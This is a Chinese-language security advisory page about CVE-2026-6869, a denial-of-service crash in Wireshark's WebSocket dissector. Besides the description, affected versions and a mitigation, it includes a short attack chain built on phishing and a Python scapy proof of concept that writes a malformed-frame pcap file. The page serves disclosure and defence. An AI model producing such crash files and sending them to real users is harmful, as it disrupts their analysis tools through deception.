IPBUF安全漏洞报告
English
CVE-2026-6869 CVSS 5.5 中危

CVE-2026-6869 Wireshark WebSocket拒绝服务漏洞

披露日期: 2026-04-30

漏洞信息

漏洞编号
CVE-2026-6869
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Wireshark

相关标签

拒绝服务WiresharkDoS协议解析

漏洞概述

Wireshark是一款广泛使用的网络协议分析器。在4.4.0至4.4.14和4.6.0至4.6.4版本中,其WebSocket协议解析器存在一个安全漏洞。攻击者可以诱导用户打开包含特制数据包的pcap文件,触发解析器崩溃,从而导致应用程序拒绝服务。该漏洞CVSS评分为5.5,属于中危级别,需要用户交互才能被利用。

技术细节

该漏洞是由于Wireshark的WebSocket协议解析器在解析特定格式的网络数据包时存在处理逻辑缺陷。当解析器遇到构造异常的WebSocket帧头或握手数据时,未能正确进行边界检查或异常处理,导致内存访问错误(如空指针解引用)。攻击向量为本地(AV:L)且需要用户交互(UI:R),意味着攻击者无法远程直接攻击,需通过社会工程学手段诱导受害者打开恶意抓包文件。一旦受害者使用存在漏洞的Wireshark版本解析该文件,解析器进程将异常终止,导致服务不可用,但不会造成信息泄露或权限提升。

攻击链分析

STEP 1
步骤1
攻击者构造包含畸形WebSocket数据包的恶意pcap文件。
STEP 2
步骤2
攻击者通过网络钓鱼或文件共享方式发送该文件给受害者。
STEP 3
步骤3
受害者使用受影响版本的Wireshark打开该pcap文件。
STEP 4
步骤4
Wireshark的WebSocket解析器处理畸形数据时触发崩溃。
STEP 5
步骤5
Wireshark应用程序终止,导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 """ PoC for CVE-2026-6869 (Wireshark WebSocket Dissector Crash) Generates a pcap file with a malformed WebSocket frame to trigger the DoS. """ from scapy.all import * # Construct a malformed WebSocket frame # Example: Invalid extended payload length or malformed headers # 0x81: FIN + Text frame # 0x7F: Extended payload length (127 bytes) # Followed by length data malformed_frame = b"\x81\x7F\x00\x00\x00\x00\x00\x00\x7E" + b"A" * 100 packet = Ether()/IP(dst="192.168.1.1")/TCP(dport=80, sport=443, flags="PA")/Raw(load=malformed_frame) # Save the packet to a pcap file wrpcap("cve_2026_6869_crash.pcap", [packet]) print("[+] PoC pcap file generated: cve_2026_6869_crash.pcap") print("[+] Open this file in a vulnerable Wireshark version to reproduce the crash.")

影响范围

Wireshark 4.4.0 - 4.4.14
Wireshark 4.6.0 - 4.6.4

防御指南

临时缓解措施
建议用户在升级前,在Wireshark设置中暂时禁用WebSocket协议解析器(通过Analyze -> Enabled Protocols),以防止在处理恶意数据包时发生崩溃。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表